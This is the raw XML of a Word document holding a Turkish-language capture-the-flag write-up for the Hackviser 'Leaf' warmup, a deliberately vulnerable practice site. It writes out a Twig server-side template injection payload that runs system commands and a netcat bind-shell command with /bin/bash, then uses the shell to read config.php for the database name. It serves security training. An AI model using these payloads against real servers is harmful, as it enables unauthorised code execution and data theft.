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BC" w:rsidRDefault="003D483D" w:rsidP="003D48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LEAF WRİTE-UP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D483D" w:rsidRDefault="003D483D" w:rsidP="003D483D">
      <w:r>
        <w:t xml:space="preserve">Bu yazımda sizlere </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Hackviser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> platformunda bulunan </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Leaf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> adlı </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>warmup’ın</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> çözümünü anlatacağım.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D483D" w:rsidRDefault="004A1A81" w:rsidP="003D483D">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">SORU 1: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Websitesinin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> başlığı nedir?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A1A81" w:rsidRDefault="00F076DB" w:rsidP="003D483D">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F076DB">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="157BA1CF" wp14:editId="54F08A27">
            <wp:extent cx="2829320" cy="819264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F076DB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Modish</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F076DB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F076DB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Tech</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00F076DB" w:rsidRDefault="00F076DB" w:rsidP="003D483D">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">SORU 2: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F076DB">
        <w:t>Ürün detayının görüntülendiği sayfada hangi GET parametresi kullanılır?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F076DB" w:rsidRDefault="0093115D" w:rsidP="003D483D">
      <w:r>
        <w:t xml:space="preserve">Herhangi bir ürüne gidiyoruz. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0093115D" w:rsidRDefault="0093115D" w:rsidP="003D483D">
      <w:r w:rsidRPr="0093115D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CADC0B7" wp14:editId="4C92C324">
            <wp:extent cx="1867161" cy="295316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5D" w:rsidRDefault="0093115D" w:rsidP="003D483D">
      <w:r>
        <w:t xml:space="preserve">Burada </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00541E2A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> kullanıldığını görüyoruz.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0093115D" w:rsidRDefault="00541E2A" w:rsidP="003D483D">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">SORU 3: </w:t>
      </w:r>
      <w:r>
        <w:t>SSTI açılımı nedir?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00541E2A" w:rsidRDefault="00541E2A" w:rsidP="003D483D">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00541E2A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Server Side </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00541E2A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Template</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00541E2A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00541E2A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Injection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00541E2A" w:rsidRDefault="00541E2A" w:rsidP="003D483D">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">SORU 4: </w:t>
      </w:r>
      <w:r w:rsidRPr="00541E2A">
        <w:t xml:space="preserve">Yaygın olarak kullanılan ve ekrana 49 ifadesini yazdıran SSTI </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00541E2A">
        <w:t>payloadı</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00541E2A">
        <w:t xml:space="preserve"> nedir?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00541E2A" w:rsidRDefault="00541E2A" w:rsidP="003D483D">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Burada bizden SSTI </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payload’ları</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> denememizi veya </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>hakim</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> olmamızı istiyor. Birazcık araştırma sonucu </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payloadı</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> buldum. </w:t>
      </w:r>
      <w:r w:rsidRPr="00541E2A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>{{7*7}}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00541E2A" w:rsidRDefault="00541E2A" w:rsidP="003D483D">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">SORU 5: </w:t>
      </w:r>
      <w:r w:rsidRPr="00541E2A">
        <w:t xml:space="preserve">Uygulamanın kullandığı </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00541E2A">
        <w:t>veritabanı</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00541E2A">
        <w:t xml:space="preserve"> adı nedir?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00894565" w:rsidRDefault="00894565" w:rsidP="003D483D">
      <w:r>
        <w:t>Sitede gezindim biraz.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00541E2A" w:rsidRDefault="00894565" w:rsidP="003D483D">
      <w:r w:rsidRPr="00894565">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D8D3D33" wp14:editId="08DAF2EE">
            <wp:extent cx="4869180" cy="1559190"/>
            <wp:effectExtent l="0" t="0" r="762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710" cy="15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22">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00894565" w:rsidRDefault="00894565" w:rsidP="003D483D">
      <w:r>
        <w:t xml:space="preserve">Burada </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> denemesi yaptıktan sonra şu sonucu aldım:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF444B" w:rsidRDefault="00894565" w:rsidP="003D483D">
      <w:r w:rsidRPr="00894565">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B281BF8" wp14:editId="2DE0BCFF">
            <wp:extent cx="9241155" cy="5334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11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5" w:rsidRDefault="00BF444B" w:rsidP="00BF444B">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Burada </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>veritabanı</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ismini </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF444B">
        <w:t>bulduk.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF444B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BF444B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Modish_tech</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00BF444B" w:rsidRDefault="00E54A2E" w:rsidP="00BF444B">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">BİZ BURADA BİRAZ ŞANS ESERİ BULDUK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E54A2E" w:rsidRDefault="00E54A2E" w:rsidP="00BF444B">
      <w:r>
        <w:t xml:space="preserve">Normal şartlar altında </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>veritabanı</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> hakkında bilgi almak için makineye erişmemiz gerekir. Şimdi o yolu deneyelim.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E54A2E" w:rsidRDefault="00E54A2E" w:rsidP="00BF444B">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E54A2E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.YOL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E54A2E" w:rsidRDefault="00E54A2E" w:rsidP="00BF444B">
      <w:r>
        <w:t xml:space="preserve">Shell almamız lazım. Önce SSTI </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payloadları</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> deniyoruz.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E54A2E" w:rsidRDefault="00C34150" w:rsidP="00BF444B">
      <w:r>
        <w:t>{{7*7}} yazınca sonucun 49 olduğunu aldım. Bu da bize TWIG kullanmamız gerektiğini doğruladı.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C34150" w:rsidRDefault="004E5EC5" w:rsidP="00BF444B">
      <w:r>
        <w:t>Uzun süren araştırmalar sonucu “</w:t>
      </w:r>
      <w:r w:rsidRPr="004E5EC5">
        <w:t>{{['&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E5EC5">
        <w:t>command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E5EC5">
        <w:t>&gt;']|</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E5EC5">
        <w:t>filter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E5EC5">
        <w:t>('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E5EC5">
        <w:t>system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E5EC5">
        <w:t>')}}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">” bu </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payload’da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yazan yere Linux komutları yazıp çalıştırabildiğimizi öğrendim. Şimdi deniyoruz.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E5EC5" w:rsidRDefault="00AD2C63" w:rsidP="00BF444B">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> denedim:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD2C63" w:rsidRDefault="00AD2C63" w:rsidP="00BF444B">
      <w:r w:rsidRPr="00AD2C63">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BAF7D89" wp14:editId="190E9DA1">
            <wp:extent cx="2372056" cy="1228896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E9F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003A1E9F">
        <w:t>Array</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003A1E9F">
        <w:t xml:space="preserve"> olduğumuzu gördük.</w:t>
      </w:r>
      <w:r w:rsidR="001E2F49">
        <w:t xml:space="preserve"> Şimdi </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001E2F49">
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001E2F49">
        <w:t xml:space="preserve"> aracı ile uzaktan bağlantı kurmayı deneyeceğim.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E2F49" w:rsidRPr="001E2F49" w:rsidRDefault="001E2F49" w:rsidP="001E2F49">
      <w:r>
        <w:t>Komut şu şekilde: {{['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nvlp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1234</w:t>
      </w:r>
      <w:r w:rsidRPr="001E2F49">
        <w:t xml:space="preserve"> -e /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E2F49">
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E2F49">
        <w:t>']|</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E2F49">
        <w:t>filter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E2F49">
        <w:t>('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E2F49">
        <w:t>system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E2F49">
        <w:t>')}}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E2F49" w:rsidRDefault="001E2F49" w:rsidP="00BF444B">
      <w:r w:rsidRPr="001E2F49">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E915785" wp14:editId="19E2BED5">
            <wp:extent cx="5760720" cy="1292860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49" w:rsidRDefault="001E2F49" w:rsidP="00BF444B">
      <w:r>
        <w:t xml:space="preserve">Çalıştıralım. </w:t>
      </w:r>
      <w:r w:rsidR="0094033F">
        <w:t xml:space="preserve"> Şimdi kendi makine terminalimize </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0094033F">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0094033F">
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0094033F">
        <w:t>nv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0094033F">
        <w:t xml:space="preserve"> 172.20.4.114 1234</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0094033F" w:rsidRDefault="0094033F" w:rsidP="00BF444B">
      <w:r>
        <w:t>Yazarak erişim sağlıyoruz.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0094033F" w:rsidRDefault="0094033F" w:rsidP="00BF444B">
      <w:r w:rsidRPr="0094033F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CBEBED2" wp14:editId="7785AE73">
            <wp:extent cx="2019300" cy="829355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300" cy="8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DD" w:rsidRDefault="00BB26DD" w:rsidP="00BF444B">
      <w:r w:rsidRPr="00BB26DD">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D3FE942" wp14:editId="37E45960">
            <wp:extent cx="1552792" cy="2353003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proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> yaptıktan sonra burada </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>config.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> dosyası gözüme çarptı.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB26DD" w:rsidRDefault="00BB26DD" w:rsidP="00BF444B">
      <w:r w:rsidRPr="00BB26DD">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D0111D5" wp14:editId="483A1521">
            <wp:extent cx="5760720" cy="187261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DD" w:rsidRDefault="00BB26DD" w:rsidP="00BF444B">
      <w:r>
        <w:t xml:space="preserve">Burada </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>config.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> dosyasının içine baktığımızda cevabımızı buluyoruz.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB26DD" w:rsidRDefault="00BB26DD" w:rsidP="00BF444B">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Veritabanımızın</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ismi </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB26DD">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>modish_tech</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00BB26DD" w:rsidRPr="00E54A2E" w:rsidRDefault="00BB26DD" w:rsidP="00BF444B">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">BÖYLELİKLE WARMUP’I ÇÖZMÜŞ OLDUK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bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00BB26DD" w:rsidRPr="00E54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87E" w:rsidRDefault="0048587E" w:rsidP="00E54A2E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="0048587E" w:rsidRDefault="0048587E" w:rsidP="00E5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87E" w:rsidRDefault="0048587E" w:rsidP="00E54A2E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="0048587E" w:rsidRDefault="0048587E" w:rsidP="00E54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4E"/>
    <w:rsid w:val="001E2F49"/>
    <w:rsid w:val="003A1E9F"/>
    <w:rsid w:val="003D483D"/>
    <w:rsid w:val="0048587E"/>
    <w:rsid w:val="004A1A81"/>
    <w:rsid w:val="004E5EC5"/>
    <w:rsid w:val="00541E2A"/>
    <w:rsid w:val="006E324E"/>
    <w:rsid w:val="00894565"/>
    <w:rsid w:val="0093115D"/>
    <w:rsid w:val="0094033F"/>
    <w:rsid w:val="00A072BC"/>
    <w:rsid w:val="00AD2C63"/>
    <w:rsid w:val="00BB26DD"/>
    <w:rsid w:val="00BF444B"/>
    <w:rsid w:val="00C34150"/>
    <w:rsid w:val="00DD5822"/>
    <w:rsid w:val="00E54A2E"/>
    <w:rsid w:val="00F0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2C07"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0E1BEF5C-ECEB-478F-8928-034A08F4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54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54A2E"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="AltBilgi">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="AltBilgiChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E54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5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2024-10-06T14:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-10-06T14:29:00Z</dcterms:modified>
</cp:coreProperties>
</file>